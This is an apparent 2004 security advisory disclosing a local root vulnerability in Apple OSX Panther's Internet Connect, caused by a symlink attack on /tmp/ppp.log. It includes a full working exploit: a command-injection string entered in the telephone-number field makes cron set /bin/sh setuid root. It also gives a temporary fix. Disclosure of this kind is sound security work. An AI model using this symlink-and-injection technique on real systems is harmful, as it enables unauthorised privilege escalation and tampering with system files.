<<< Date Index >>>     <<< Thread Index >>>

OSX Panther Internet Connect - Local root




Apple OSX Panther Internet Connect - Local root Vulnerability.
===========================================
===================

Date:           25.07.2004
Author:         B-r00t. 2004.
Email:          B-r00t <br00t@xxxxxxxxxxxxxxxx>

Vendor:         Apple

Operating
System:         OSX Panther (Possibly Previous Versions).

Application:    Internet Connect.app

Tested:         Panther 10.3.4 (Internet Connect v1.3)

Problem:                Internet Connect allows any file on the file
                        system to be altered.

Status:         0day! - Temporary Fix Included.

Description:
                Apples Internet Connect application creates a
                'ppp.log' file in '/tmp/'. If the file already
                exists it is opened in append mode. If it does
                not exist a new file is created.

                It is possible to trick Internet Connect into
                appending data to any file on the filesystem by
                creating a symlink file '/tmp/ppp.log' pointing
                to the file to be altered.

                If the file '/tmp/ppp.log' already exists, the
                attack is not possible as the file is owned by
                user 'root' and group 'wheel': -

                $ ls -l /tmp/ppp.log
                -rw-r--r--  1 root  wheel  807 24 Jul 23:44 /tmp/ppp.log

                However, due to the Operating System clearing the
                '/tmp' directory during system startup and also on
                a regular basis due to system maintenance, it
                becomes possible to form the attack as shown below:

                First a file is created to represent a system file,
                owned and only writable by user 'root'.

                maki:~ # echo "TEST" > /etc/file_owned_by_root
                
                maki:~ # ls -l /etc/file_owned_by_root
                -rw-r--r--  1 root  wheel  5 25 Jul 00:09 /etc/
file_owned_by_root
                
                maki:~ # cat /etc/file_owned_by_root
                TEST
                
                A symlink is now created in the '/tmp' directory to
                point to the file to be altered. It is important to
                realise that the link can be created as a none 'admin'
                or 'root' user.

                maki:/tmp $ id
                uid=502(br00t) gid=502(br00t) groups=502(br00t)

                maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
                
                maki:/tmp $ ls -l ./ppp.log
                lrwxr-xr-x  1 root  wheel  23 25 Jul 00:11 ./ppp.log@ -> /
etc/file_owned_by_root

                Now Internet Connect is opened. Under 'configuration'
                choose 'Other'. Enter some text into the 'Telephone
                Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.

                'Cancel' can be clicked several seconds later.

                Checking the original file '/etc/file_owned_by_root'
                we see the following: -

                maki:~ $ cat /etc/file_owned_by_root
                TEST
                Sun Jul 25 00:20:42 2004 : Version 2.0
                Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
                Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
                Sun Jul 25 00:20:58 2004 : Serial link disconnected.

                As can be seen, data has been appended to the 'protected'
                file.

Impact: It is possible for a local user to escalate their
                privileges by appending data to specific system files.
                In addition, a malicious user may be able to render the
                machine unusable by corrupting important system files.

Exploit:        This demonstration appends commands to the '/etc/daily'
                file which is executed by default at 3:15AM each day.
                An alternative attack might involve appending to any
                of the files that are sourced at system start up such
                as '/etc/rc.common'. This latter method is convenient
                if the user is able to reboot the machine.
                
                Create our link
                maki:~ $ ln -s /etc/daily /tmp/ppp.log

                Open Internet Connect.
                Internal Modem -> Configuration -> Other

                Internet Connect only allows certain characters to be
                used for the telephone number. The background '&'
                character allows our command string to execute amongst
                the time and date strings also appended.

                Telephone Number:
                & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 
sh &

                Click 'Connect' ...*wait (10secs) ... 'Cancel'

                Check the '/etc/daily' file.
                maki:~ $ tail /etc/daily
                if [ -f /etc/security ]; then
                echo ""
                echo "Running security:"
                sh /etc/security 2>&1 | sendmail root
                fi

                Sun Jul 25 03:10:11 2004 : Version 2.0
                Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. 
&& cd .. && cd bin && chmod 4755 sh &
                Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
                Sun Jul 25 03:10:17 2004 : Serial link disconnected.

                Now sit back and wait for cron to execute '/etc/daily' at 03:
15AM.
                
                maki:~ $ date
                Sun Jul 25 03:13:43 CEST 2004

                maki:~ $ cd /bin

                maki:/bin $ ls -l sh
                -r-xr-xr-x  1 root  wheel  603488 25 Jun 09:39 sh*

                maki:/bin $ date
                Sun Jul 25 03:15:50 CEST 2004

                maki:/bin $ ls -l sh
                -rwsr-xr-x  1 root  wheel  603488 25 Jun 09:39 sh*

                maki:/bin $ sh
                
                maki:/bin # id
                uid=502(br00t) euid=0(root) gid=502(br00t) 
groups=502(br00t)

                All thats left to do is clean up '/etc/daily' and remove the 
link
                '/tmp/ppp.log'          

FIX:            The following commands serve to provide a temporary fix 
until
                Apple release an official update.

                Open a terminal: /Applications/Utilities/Terminal.app
                Gain root access using 'sudo':

                maki:~ $ sudo sh
                Password:[YOUR PASSWORD]
        
                maki:~ # whoami
                root

                You can copy and paste the following commands: -

                /usr/bin/touch /tmp/ppp.log
                echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
                echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common

                These commands ensure that a '/tmp/ppp.log' file is
                present to prevent a user from creating a link as shown
                above. Alternatively the line:

                /usr/bin/touch /tmp/ppp.log

                can be added to each file '/etc/daily' and '/etc/rc.common'
                manually using an editor and root privileges.

Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft.
                s1, Blex & the old #cheese posse (RIP).
                Maz ... Good Luck For The Wedding!

                

B#.
--

----------------------------------------------------
Email : B-r00t <br00t@xxxxxxxxxxxxxxxx>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
                  ED33 AD56 9E97 7101 5462

"There's no way a highschool punk can put a dime
into a telephone and break into our system."
-----------------------------------------------------